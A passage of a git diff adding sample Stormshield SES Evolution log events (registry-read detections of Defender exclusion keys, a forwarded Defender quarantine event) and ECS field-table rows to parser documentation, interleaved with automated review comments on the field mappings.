\"HashSha1\": \"2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E\", \"HashSha256\": \"08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED\", \"IsProtectedOrCritical\": true, \"CertificateSignatureState\": 1, \"CertificateSignatureStateComputedMap\": \"SignatureStateTrusted\", \"Certificates\": [{\"Algorithm\": \"SHA256\", \"IssuerCN\": \"Microsoft Windows Production PCA 2011\", \"SubjectCN\": \"Microsoft Windows Publisher\", \"SigningTime\": \"2024-05-11T03:15:15.5120000+02:00\", \"ValidityStart\": \"2024-02-08T21:22:45.0000000+02:00\", \"ValidityEnd\": \"2025-02-07T21:22:45.0000000+02:00\"}], \"ProcessStartTime\": \"2024-07-09T10:03:54.4154623+02:00\", 
\"ProcessStartTimeRaw\": 133649858344154623}, \"Action\": {\"PolicyGuid\": \"{DDAB1006-337F-4B8C-8486-E5A9619144BB}\", \"PolicyVersion\": 14, \"RuleGuid\": \"{4FAC2120-288B-4B3C-9F77-2E5B6ECBB85E}\", \"BaseRuleGuid\": \"{49A8528E-E749-4A9D-8736-2CF9380DE241}\", \"IdentifierGuid\": \"{0B7EF8C7-FAE0-4890-981A-22FE12F22173}\", \"Blocked\": false, \"RequestMoveToQuarantine\": false, \"UserDecision\": false, \"SourceProcessKilled\": false, \"RuleTags\": [\"T1562.001\"]}, \"Path\": \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Processes\", \"ValueName\": \"C:\\\\Program Files\\\\Stormshield\\\\SES Evolution\\\\Agent\\\\Bin\\\\EsInject.exe\"}, \"AdditionalData\": {\"AgentAddresses\": [\"1.2.3.4\"], \"AgentGroupGuid\": \"{8AD24A5D-0B19-45E2-9B28-F584F8A54CBC}\", \"AgentGroupName\": \"Demo\", \"AgentGuid\": \"{CC0772D7-8EBC-4EE6-9FC0-A8B26F5FA7FF}\", \"AgentName\": \"WIN10-A\", \"AttackCVEId\": null, \"AttackMitreTacticId\": [\"TA0005\"], \"AttackMitreTacticName\": [\"Defense Evasion\"], \"AttackMitreTechnicId\": [\"T1562\", \"T1562.001\"], \"AttackMitreTechnicName\": [\"Impair Defenses\", \"Disable or Modify Tools\"], \"AttackSESId\": null, \"AttackTriggerCondition\": \"An untrusted process attempts to add bypass into Windows Defender.\", \"CategoryName\": \"Registry\", \"IncidentGuid\": \"{DA0FA4D3-76B8-4EE0-A8B7-5AFDF9F80071}\", \"Message\": \"The 'MsMpEng.exe' process read the registry value 'C:\\\\Program Files\\\\Stormshield\\\\SES Evolution\\\\Agent\\\\Bin\\\\EsInject.exe'\", \"PolicyName\": \"Demo - Protect policy\", \"SeverityName\": \"Critical\"}}", + "event": { + "category": [ + "registry" + ], + "code": "RegistryValueRead", + "reason": "The 'MsMpEng.exe' process read the registry value 'C:\\Program Files\\Stormshield\\SES Evolution\\Agent\\Bin\\EsInject.exe'", + "severity": 2, + "type": [ + "access" + ] + }, + "@timestamp": "2024-07-09T10:33:11.249195Z", + "process": { + "command_line": "\"C:\\ProgramData\\Microsoft\\Windows 
Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe\"", + "executable": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe", + "hash": { + "md5": "4A4D6E95B693256BCD6E90FDC077194A", + "sha1": "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "sha256": "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED" + }, + "name": "MsMpEng.exe", + "pid": 3948, + "start": "2024-07-09T08:03:54.415462Z", + "user": { + "id": "S-1-5-21-2222222-33333333-44444444-555", + "name": "JOHNDOE" + } + }, + "registry": { + "hive": "HKEY_LOCAL_MACHINE", + "key": "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes", + "path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes" + }, + "related": { + "hash": [ + "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED", + "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "4A4D6E95B693256BCD6E90FDC077194A" + ] + }, + "rule": { + "ruleset": "Demo - Protect policy", + "uuid": "4FAC2120-288B-4B3C-9F77-2E5B6ECBB85E" + }, + "stormshield": { + "ses": { + "action": { + "blocked": false, + "user_decision": false + }, + "categoryname": "Registry", + "incident": { + "id": "{DA0FA4D3-76B8-4EE0-A8B7-5AFDF9F80071}" + }, + "level": "Critical", + "process": { + "user": { + "domain": "TEST" + } + }, + "source_process": { + "killed": false + }, + "type": "114" + } + }, + "threat": { + "tactic": { + "id": [ + "TA0005" + ], + "name": [ + "Defense Evasion" + ] + }, + "technique": { + "id": [ + "T1562", + "T1562.001" + ], + "name": [ + "Disable or Modify Tools", + "Impair Defenses" + ] + } + } + } + + ``` + + === "test_type_115.json" ```json 
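Review bot: in `test_type_114_2.json`, the raw event carries `ValueName: "C:\\Program Files\\Stormshield\\SES Evolution\\Agent\\Bin\\EsInject.exe"` (this is a RegistryValueRead), yet the parsed `registry` object has only `hive`, `key` and `path`; the `test_type_113_1.json` sample maps `ValueName` to `registry.value`, and the field table in this patch adds `registry.value`, so the same mapping should apply to type 114 or the value name that was read is lost. The same two issues noted on `test_type_104_2.json` recur here: `threat.technique.name` is sorted out of step with `threat.technique.id`, and `AgentName`/`AgentAddresses` are not mapped to `host.name`/`host.ip`.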
@@ -869,9 +1160,16 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "registry": { + "data": { + "strings": [ + "lala" + ], + "type": "REG_SZ" + }, "hive": "HKEY_CURRENT_USER", "key": "SOFTWARE\\TEST_ADE", - "path": "HKEY_CURRENT_USER\\SOFTWARE\\TEST_ADE" + "path": "HKEY_CURRENT_USER\\SOFTWARE\\TEST_ADE", + "value": "Valeur_String" }, "related": { "hash": [ 
@@ -2394,6 +2692,90 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_type_20048_1.json" + + ```json + + { + "message": "{\n \"Version\": 1,\n \"Type\": 20048,\n \"TypeComputedMap\": \"External\",\n \"Severity\": 4,\n \"ServerReserved\": 0,\n \"Attributes\": 32,\n \"AttributesComputedBitMap\": [\n \"External\"\n ],\n \"EventGuid\": \"{5838A063-4210-4268-ADB0-39FC5B55A212}\",\n \"GenerateIncident\": false,\n \"Timestamp\": \"2024-03-22T14:01:26.6589969+00:00\",\n \"TimestampRaw\": 133555896866589969,\n \"SpecificData\": {\n \"Action\": {\n \"PolicyGuid\": \"{DFDA0F76-10AF-4615-B093-7AA46CC2E7A3}\",\n \"PolicyVersion\": 5,\n \"RuleGuid\": \"{63B63F11-7C06-4555-9542-3F7E795B98EE}\",\n \"BaseRuleGuid\": \"{9B076C45-6373-4A4E-9310-F139A66794B4}\",\n \"IdentifierGuid\": \"{00000000-0000-0000-0000-000000000000}\",\n \"Blocked\": false,\n \"RequestMoveToQuarantine\": false,\n \"UserDecision\": false,\n \"SourceProcessKilled\": false\n },\n \"Description\": \"localized:EventForwarding_WinDefender_MalwareProtectionStateMalwareActionTaken\",\n \"OriginType\": 2,\n \"ExtraData\": {\n \"_SourceCategory\": 0,\n \"_HideFromUsers\": 1,\n \"_OriginalText\": \"2024 Mar 22 14:01:25 WinEvtLog: Microsoft-Windows-Windows Defender/Operational: INFORMATION(1117): Microsoft-Windows-Windows Defender: SYSTEM: NT AUTHORITY: DESKTOP-001: Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software. 
For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0 \\tName: Trojan:Win32/BatTamper.A \\tID: 2147818424 \\tSeverity: Severe \\tCategory: Trojan \\tPath: file:_C:\\\\Users\\\\Lab\\\\Downloads\\\\TurnOffAV.ps1; webfile:_C:\\\\Users\\\\Lab\\\\Downloads\\\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048 \\tDetection Origin: Internet \\tDetection Type: Concrete \\tDetection Source: Downloads and attachments \\tUser: NT AUTHORITY\\\\SYSTEM \\tProcess Name: Unknown \\tAction: Quarantine \\tAction Status: No additional actions required \\tError Code: 0x00000000 \\tError description: The operation completed successfully. \\tSecurity intelligence Version: AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0 \\tEngine Version: AM: 1.1.24020.9, NIS: 1.1.24020.9\",\n \"program_name\": \"WinEvtLog\",\n \"_NormalizerNames\": \"syslog-1-date-fmt-4, syslog-1-solaris-progname-1\",\n \"_NormalizerIds\": \"4, 6\",\n \"_FileType\": \"windows\",\n \"_ExtractorIds\": \"1\",\n \"_ExtractorNames\": \"windows\",\n \"_RuleDescription\": \"localized:EventForwarding_WinDefender_MalwareProtectionStateMalwareActionTaken\",\n \"_RuleId\": 13,\n \"_RuleImportedId\": 24,\n \"_RuleKeywords\": \"windows-defender\",\n \"_RuleLevel\": 6,\n \"__EvtXml\": {\n \"Event\": {\n \"System\": {\n \"Provider\": {\n \"Name\": \"Microsoft-Windows-Windows Defender\",\n \"Guid\": \"{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}\"\n },\n \"EventID\": \"1117\",\n \"Version\": \"0\",\n \"Level\": \"4\",\n \"Task\": \"0\",\n \"Opcode\": \"0\",\n \"Keywords\": \"0x8000000000000000\",\n \"TimeCreated\": {\n \"SystemTime\": \"2024-03-22T14:01:25.6359716Z\"\n },\n \"EventRecordID\": \"613\",\n \"Correlation\": {},\n \"Execution\": {\n \"ProcessID\": \"5384\",\n \"ThreadID\": \"4576\"\n },\n \"Channel\": \"Microsoft-Windows-Windows Defender/Operational\",\n \"Computer\": \"DESKTOP-001\",\n \"Security\": 
{\n \"UserID\": \"S-1-5-18\"\n }\n },\n \"EventData\": {\n \"Product Name\": \"Microsoft Defender Antivirus\",\n \"Product Version\": \"4.18.23110.3\",\n \"Detection ID\": \"{9C26ADFE-43AA-4884-9765-A2EC223DC7E0}\",\n \"Detection Time\": \"2024-03-22T14:01:20.550Z\",\n \"Threat ID\": \"2147818424\",\n \"Threat Name\": \"Trojan:Win32/BatTamper.A\",\n \"Severity ID\": \"5\",\n \"Severity Name\": \"Severe\",\n \"Category ID\": \"8\",\n \"Category Name\": \"Trojan\",\n \"FWLink\": \"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0\",\n \"Status Code\": \"4\",\n \"State\": \"2\",\n \"Source ID\": \"4\",\n \"Source Name\": \"Downloads and attachments\",\n \"Process Name\": \"Unknown\",\n \"Detection User\": \"DESKTOP-001\\\\Lab\",\n \"Path\": \"file:_C:\\\\Users\\\\Lab\\\\Downloads\\\\TurnOffAV.ps1; webfile:_C:\\\\Users\\\\Lab\\\\Downloads\\\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048\",\n \"Origin ID\": \"4\",\n \"Origin Name\": \"Internet\",\n \"Execution ID\": \"0\",\n \"Execution Name\": \"Unknown\",\n \"Type ID\": \"0\",\n \"Type Name\": \"Concrete\",\n \"Pre Execution Status\": \"0\",\n \"Action ID\": \"2\",\n \"Action Name\": \"Quarantine\",\n \"Error Code\": \"0x00000000\",\n \"Error Description\": \"The operation completed successfully. 
\",\n \"Post Clean Status\": \"0\",\n \"Additional Actions ID\": \"0\",\n \"Additional Actions String\": \"No additional actions required\",\n \"Remediation User\": \"NT AUTHORITY\\\\SYSTEM\",\n \"Security intelligence Version\": \"AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0\",\n \"Engine Version\": \"AM: 1.1.24020.9, NIS: 1.1.24020.9\"\n }\n }\n }\n },\n \"Fields\": {\n \"_RuleGuid\": \"{63B63F11-7C06-4555-9542-3F7E795B98EE}\",\n \"_BaseRuleGuid\": \"{9B076C45-6373-4A4E-9310-F139A66794B4}\"\n }\n },\n \"AdditionalData\": {\n \"AgentAddresses\": [\n \"192.168.0.1\"\n ],\n \"AgentGroupGuid\": \"{8C2850C0-1A73-4CBC-9831-5AA5D1438AF2}\",\n \"AgentGroupName\": \"Desktop\",\n \"AgentGuid\": \"{0E6DAED4-3505-4F96-9F8D-55FBC85CA4C7}\",\n \"AgentName\": \"DESKTOP-001\",\n \"CategoryName\": \"External\",\n \"IncidentGuid\": null,\n \"Message\": \"Windows Defender: The antimalware platform performed an action to protect your system from malware or other potentially unwanted software.\",\n \"PolicyName\": \"Lab Policy\",\n \"SeverityName\": \"Warning\"\n }\n}", + "event": { + "code": "1117", + "provider": "Microsoft-Windows-Windows Defender", + "reason": "Windows Defender: The antimalware platform performed an action to protect your system from malware or other potentially unwanted software.", + "severity": 4 + }, + "@timestamp": "2024-03-22T14:01:26.658996Z", + "action": { + "id": "1117", + "properties": { + "action_id": "2", + "action_name": "Quarantine", + "additional_actions_id": "0", + "additional_actions_string": "No additional actions required", + "category_id": "8", + "category_name": "Trojan", + "detection_id": "{9C26ADFE-43AA-4884-9765-A2EC223DC7E0}", + "detection_time": "2024-03-22T14:01:20.550Z", + "detection_user": "DESKTOP-001\\Lab", + "engine_version": "AM: 1.1.24020.9, NIS: 1.1.24020.9", + "error_code": "0x00000000", + "error_description": "The operation completed successfully. 
", + "execution_id": "0", + "execution_name": "Unknown", + "fwlink": "https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0", + "origin_id": "4", + "origin_name": "Internet", + "path": "file:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1; webfile:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048", + "post_clean_status": "0", + "pre_execution_status": "0", + "process_name": "Unknown", + "product_name": "Microsoft Defender Antivirus", + "product_version": "4.18.23110.3", + "remediation_user": "NT AUTHORITY\\SYSTEM", + "security_intelligence_version": "AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0", + "severity_id": "5", + "severity_name": "Severe", + "source_id": "4", + "source_name": "Downloads and attachments", + "state": "2", + "status_code": "4", + "task": "0", + "threat_id": "2147818424", + "threat_name": "Trojan:Win32/BatTamper.A", + "type_id": "0", + "type_name": "Concrete" + }, + "record_id": "613" + }, + "process": { + "pid": 5384, + "thread": { + "id": 4576 + } + }, + "rule": { + "ruleset": "Lab Policy", + "uuid": "63B63F11-7C06-4555-9542-3F7E795B98EE" + }, + "stormshield": { + "ses": { + "action": { + "blocked": false, + "user_decision": false + }, + "categoryname": "External", + "level": "Warning", + "source_process": { + "killed": false + }, + "type": "20048" + } + } + } + + ``` + + === "test_type_20049.json" ```json 
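Review bot: the `test_type_20048_1.json` parsed event has `event.code`, `event.provider`, `event.reason` and `event.severity` but no `event.category` or `event.type`, unlike the registry samples (`["registry"]` / `["access"]`); for a forwarded Defender 1117 "action taken" event, `event.category: ["malware"]` and `event.type: ["info"]` would let built-in rules keyed on ECS categories pick it up. Two further points on the same hunk: `action.properties.error_description` looks like it keeps trailing whitespace after "The operation completed successfully." (the value is split across lines in both the raw `EventData` and the parsed output), so trim it; and `process.pid: 5384` / `process.thread.id: 4576` come from the event's `Execution` element, i.e. the Defender service that wrote the log, not from the detected file's process (`pid:13760` inside `Path`), which is worth stating in the field descriptions so analysts do not pivot on the wrong PID. `AgentName: "DESKTOP-001"` is again not mapped to `host.name`.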
@@ -6142,8 +6524,48 @@ The following table lists the fields that are extracted, normalized under the EC | Name | Type | Description | | ---- | ---- | ---------------------------| |`@timestamp` | `date` | Date/time when the event originated. | +|`action.id` | `keyword` | stormshield action id | |`action.properties.TargetCommandLine` | `keyword` | stormshield targeted process command line | |`action.properties.TargetImage` | `keyword` | stormshield targeted process executable | +|`action.properties.action_id` | `keyword` | stormshield property Action ID | +|`action.properties.action_name` | `keyword` | stormshield property Action Name | +|`action.properties.additional_actions_id` | `keyword` | stormshield property Additional Actions ID | +|`action.properties.additional_actions_string` | `keyword` | stormshield property Additional Actions String | +|`action.properties.category_id` | `keyword` | stormshield property Category ID | +|`action.properties.category_name` | `keyword` | stormshield property Category Name | +|`action.properties.detection_id` | `keyword` | stormshield property Detection ID | +|`action.properties.detection_time` | `keyword` | stormshield property Detection Time | +|`action.properties.detection_user` | `keyword` | stormshield property Detection User | +|`action.properties.engine_version` | `keyword` | stormshield property Engine Version | +|`action.properties.error_code` | `keyword` | stormshield property Error Code | +|`action.properties.error_description` | `keyword` | stormshield property Error Description | +|`action.properties.execution_id` | `keyword` | stormshield property Execution ID | +|`action.properties.execution_name` | `keyword` | stormshield property Execution Name | +|`action.properties.fwlink` | `keyword` | stormshield property FWLink | +|`action.properties.opcode` | `keyword` | stormshield action opcode | +|`action.properties.origin_id` | `keyword` | stormshield property Origin ID | +|`action.properties.origin_name` | `keyword` | 
stormshield property Origin Name | +|`action.properties.path` | `keyword` | stormshield property Path | +|`action.properties.post_clean_status` | `keyword` | stormshield property Post Clean Status | +|`action.properties.pre_execution_status` | `keyword` | stormshield property Pre Execution Status | +|`action.properties.process_name` | `keyword` | stormshield property Process Name | +|`action.properties.product_name` | `keyword` | stormshield property Product Name | +|`action.properties.product_version` | `keyword` | stormshield property Product Version | +|`action.properties.remediation_user` | `keyword` | stormshield property Remediation User | +|`action.properties.security_intelligence_version` | `keyword` | stormshield property Security intelligence Version | +|`action.properties.severity_id` | `keyword` | stormshield property Severity ID | +|`action.properties.severity_name` | `keyword` | stormshield property Severity Name | +|`action.properties.source_id` | `keyword` | stormshield property Source ID | +|`action.properties.source_name` | `keyword` | stormshield property Source Name | +|`action.properties.state` | `keyword` | stormshield property State | +|`action.properties.status_code` | `keyword` | stormshield property Status Code | +|`action.properties.task` | `keyword` | stormshield action task | +|`action.properties.threat_id` | `keyword` | stormshield property Threat ID | +|`action.properties.threat_name` | `keyword` | stormshield property Threat Name | +|`action.properties.type_id` | `keyword` | stormshield property Type ID | +|`action.properties.type_name` | `keyword` | stormshield property Type Name | +|`action.record_id` | `keyword` | stormshield action record id | +|`agent.id` | `keyword` | Unique identifier of this agent. | |`destination.ip` | `ip` | IP address of the destination. | |`destination.mac` | `keyword` | MAC address of the destination. | |`destination.port` | `long` | Port of the destination. | 
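Review bot: the new `action.*` rows describe each field as "stormshield property <Name>" without saying what it holds; in the `test_type_20048_1.json` sample these are the Windows Defender `EventData` values, `action.id` is the Windows Event ID (`1117`) and `action.record_id` is `EventRecordID`, so the descriptions should say so (e.g. "Windows event ID of the forwarded event", "Defender threat name, e.g. Trojan:Win32/BatTamper.A"). `action.properties.opcode` and `action.properties.task` are described as "stormshield action opcode/task", but only `task` appears in the sample and it sits under `action.properties` with the Defender values, so check that `opcode` is actually emitted. `agent.id` is added to the table, yet none of the samples in this patch populates it even though every raw event carries `AgentGuid`; either map `AgentGuid` to `agent.id` (without braces, as `rule.uuid` does) or drop the row.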
@@ -6159,6 +6581,8 @@ The following table lists the fields that are extracted, normalized under the EC |`file.hash.ssdeep` | `keyword` | SSDEEP hash. | |`file.owner` | `keyword` | File owner's username. | |`file.path` | `keyword` | Full path to the file, including the file name. | +|`host.ip` | `ip` | Host ip addresses. | +|`host.name` | `keyword` | Name of the host. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | |`network.type` | `keyword` | In the OSI Model this would be the Network Layer. ipv4, ipv6, ipsec, pim, etc | |`process.command_line` | `wildcard` | Full command line that started the process. | @@ -6177,9 +6601,14 @@ The following table lists the fields that are extracted, normalized under the EC |`process.parent.start` | `date` | The time the process started. | |`process.pid` | `long` | Process id. | |`process.start` | `date` | The time the process started. | +|`process.thread.id` | `long` | Thread ID. | +|`registry.data.bytes` | `keyword` | Original bytes written with base64 encoding. | +|`registry.data.strings` | `wildcard` | List of strings representing what was written to the registry. | +|`registry.data.type` | `keyword` | Standard registry type for encoding contents | |`registry.hive` | `keyword` | Abbreviated name for the hive. | |`registry.key` | `keyword` | Hive-relative path of keys. | |`registry.path` | `keyword` | Full path, including hive, key and value | +|`registry.value` | `keyword` | Name of the value written. | |`rule.ruleset` | `keyword` | Rule ruleset | |`rule.uuid` | `keyword` | Rule UUID | |`source.ip` | `ip` | IP address of the source. | 
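Review bot: `host.ip` and `host.name` are added to the field table, but in this patch only the `test_type_113_1.json` sample populates them; the `test_type_104_2.json`, `test_type_114_2.json` and `test_type_20048_1.json` samples all carry `AgentName` (and two of them `AgentAddresses`) without a `host` block. The table should reflect what the parser emits for every event type, so the mapping needs to be applied uniformly.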
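Review bot: the `registry.data.bytes` row says "Original bytes written with base64 encoding", which matches ECS but contradicts the `test_type_113_1.json` sample in this patch, where the field is an array of decimal strings; fix the parser output (base64 string) rather than the description. Style: `registry.data.type` is the only new row in this block whose description lacks a terminating period ("Standard registry type for encoding contents").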
@@ -6197,10 +6626,15 @@ The following table lists the fields that are extracted, normalized under the EC |`stormshield.ses.process.user.domain` | `keyword` | Name of the directory the user is a member of | |`stormshield.ses.source_process.killed` | `boolean` | Was the source process killed | |`stormshield.ses.type` | `keyword` | Event Type ( it's a number ) | +|`threat.tactic.id` | `keyword` | Threat tactic id. | +|`threat.tactic.name` | `keyword` | Threat tactic. | +|`threat.technique.id` | `keyword` | Threat technique id. | +|`threat.technique.name` | `keyword` | Threat technique name. | |`url.original` | `wildcard` | Unmodified original url as seen in the event source. | |`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.id` | `keyword` | Unique identifier of the user. | |`user.name` | `keyword` | Short name or login of the user. | +|`vulnerability.id` | `keyword` | ID of the vulnerability. | diff --git a/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0_sample.md b/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0_sample.md index e29f3992d9..9128d81486 100644 --- a/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0_sample.md +++ b/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0_sample.md 
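Review bot: `vulnerability.id` is added to the field table, presumably sourced from `AttackCVEId`, but that field is `null` in every raw sample in this patch, so nothing exercises the mapping; add a sample with a non-null `AttackCVEId` or note in the description where the value comes from. The `threat.*` descriptions are uneven ("Threat tactic." versus "Threat technique name."); "Threat tactic name." would keep them parallel. Since the samples show `threat.technique.name` sorted independently of `threat.technique.id`, it would also help to state in these descriptions whether the two arrays are index-aligned.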
@@ -461,6 +461,114 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_type_104_2" + + + ```json + { + "Version": 1, + "Type": 104, + "TypeComputedMap": "RegistryKeyRead", + "Severity": 2, + "ServerReserved": 0, + "Attributes": 2, + "AttributesComputedBitMap": [ + "Protection" + ], + "EventGuid": "{4C8EFA24-0021-49CA-B9F7-CF5A7BF57173}", + "GenerateIncident": true, + "Timestamp": "2024-07-09T12:08:54.9660242+02:00", + "TimestampRaw": 133649933349660242, + "SpecificData": { + "SourceProcess": { + "PID": 3948, + "ProcessGuid": "{93158E40-E93F-46CE-BCE0-3FC359B07B75}", + "ProcessImageName": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe", + "VolumeZone": 1, + "VolumeZoneComputedBitMap": [ + "Operating system" + ], + "ProcessCommandLine": "\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe\"", + "User": "S-1-5-21-2222222-33333333-44444444-555", + "UserNameLookup": "JOHNDOE", + "UserDomainLookup": "TEST", + "IntegrityLevel": "S-1-16-16384", + "IntegrityLevelNameLookup": "Niveau obligatoire syst\u00e8me", + "IntegrityLevelDomainLookup": "\u00c9tiquette obligatoire", + "SessionID": 0, + "HashMd5": "4A4D6E95B693256BCD6E90FDC077194A", + "HashSha1": "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "HashSha256": "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED", + "IsProtectedOrCritical": true, + "CertificateSignatureState": 1, + "CertificateSignatureStateComputedMap": "SignatureStateTrusted", + "Certificates": [ + { + "Algorithm": "SHA256", + "IssuerCN": "Microsoft Windows Production PCA 2011", + "SubjectCN": "Microsoft Windows Publisher", + "SigningTime": "2024-05-11T03:15:15.5120000+02:00", + "ValidityStart": "2024-02-08T21:22:45.0000000+02:00", + "ValidityEnd": "2025-02-07T21:22:45.0000000+02:00" + } + ], + "ProcessStartTime": "2024-07-09T10:03:54.4154623+02:00", + "ProcessStartTimeRaw": 133649858344154623 + }, + "Action": { + "PolicyGuid": 
"{2042076D-A879-4913-A2C7-E94A9ECE8D79}", + "PolicyVersion": 14, + "RuleGuid": "{F676C8C4-D8FD-4ED2-89FB-C949EA33951C}", + "BaseRuleGuid": "{508448D3-1872-416D-99D9-A3F64AE24C48}", + "IdentifierGuid": "{6F1EAB4E-60E5-4DA2-8509-768988375E47}", + "Blocked": false, + "RequestMoveToQuarantine": false, + "UserDecision": false, + "SourceProcessKilled": false, + "RuleTags": [ + "T1562.001" + ] + }, + "Path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\TemporaryPaths", + "InformationClass": 4, + "InformationClassComputedMap": "KeyCachedInformation" + }, + "AdditionalData": { + "AgentAddresses": [ + "1.2.3.4" + ], + "AgentGroupGuid": "{1B24AC36-5218-4F44-A374-80D86475E325}", + "AgentGroupName": "Demo", + "AgentGuid": "{6CA7D1BE-7359-426D-B5B1-D9E742DF69A6}", + "AgentName": "WIN10-A", + "AttackCVEId": null, + "AttackMitreTacticId": [ + "TA0005" + ], + "AttackMitreTacticName": [ + "Defense Evasion" + ], + "AttackMitreTechnicId": [ + "T1562", + "T1562.001" + ], + "AttackMitreTechnicName": [ + "Impair Defenses", + "Disable or Modify Tools" + ], + "AttackSESId": null, + "AttackTriggerCondition": "An untrusted process attempts to add bypass into Windows Defender.", + "CategoryName": "Registry", + "IncidentGuid": "{CE926A32-4461-47C0-BDE8-43C1493E7DF0}", + "Message": "The 'MsMpEng.exe' process read the registry key 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\TemporaryPaths'", + "PolicyName": "Demo - Protect policy", + "SeverityName": "Critical" + } + } + ``` + + + === "test_type_109" 
@@ -828,6 +936,102 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_type_113_1" + + + ```json + { + "Version": 1, + "Type": 113, + "TypeComputedMap": "RegistryValueCreate", + "Severity": 5, + "ServerReserved": 9, + "Attributes": 8, + "AttributesComputedBitMap": [ + "Audit" + ], + "EventGuid": "{E8B35E85-838F-44E5-B7AB-7635E9C81ECB}", + "GenerateIncident": false, + "Timestamp": "2024-03-22T12:39:27.6422102+01:00", + "TimestampRaw": 133555811676422102, + "SpecificData": { + "SourceProcess": { + "PID": 1196, + "ProcessGuid": "{B0E2F52D-8C18-4DF8-8E73-470BB4E5D373}", + "ProcessImageName": "C:\\Windows\\regedit.exe", + "VolumeZone": 1, + "VolumeZoneComputedBitMap": [ + "Operatingsystem" + ], + "ProcessCommandLine": "\"C:\\WINDOWS\\regedit.exe\"", + "User": "S-1-5-21-2222222-33333333-44444444-555", + "UserNameLookup": "JOHNDOE", + "UserDomainLookup": "TEST", + "IntegrityLevel": "S-1-16-8192", + "IntegrityLevelNameLookup": "MediumMandatoryLevel", + "IntegrityLevelDomainLookup": "MandatoryLabel", + "SessionID": 2, + "HashMd5": "999A30979F6195BF562068639FFC4426", + "HashSha1": "D4F2663AABC03478975382B3C69F24B3C6BD2AA9", + "HashSha256": "92F24FED2BA2927173AAD58981F6E0643C6B89815B117E8A7C4A0988AC918170", + "IsProtectedOrCritical": false, + "CertificateSignatureState": 1, + "CertificateSignatureStateComputedMap": "SignatureStateTrusted", + "Certificates": [ + { + "Algorithm": "SHA256", + "IssuerCN": "MicrosoftWindowsProductionPCA2011", + "SubjectCN": "MicrosoftWindows", + "SigningTime": "2023-01-18T02:58:33.2360000+01:00", + "ValidityStart": "2022-05-05T20:23:14.0000000+01:00", + "ValidityEnd": "2023-05-04T20:23:14.0000000+01:00" + } + ], + "ProcessStartTime": "2023-03-06T16:04:21.8793902+01:00", + "ProcessStartTimeRaw": 133225886618793902 + }, + "Action": { + "PolicyGuid": "{BF0D5FEE-FF2A-4E6B-97DA-A1FC246FE845}", + "PolicyVersion": 4, + "RuleGuid": "{4CEEDD7A-875D-4C7E-9ABD-A710BD3DD0C0}", + "BaseRuleGuid": 
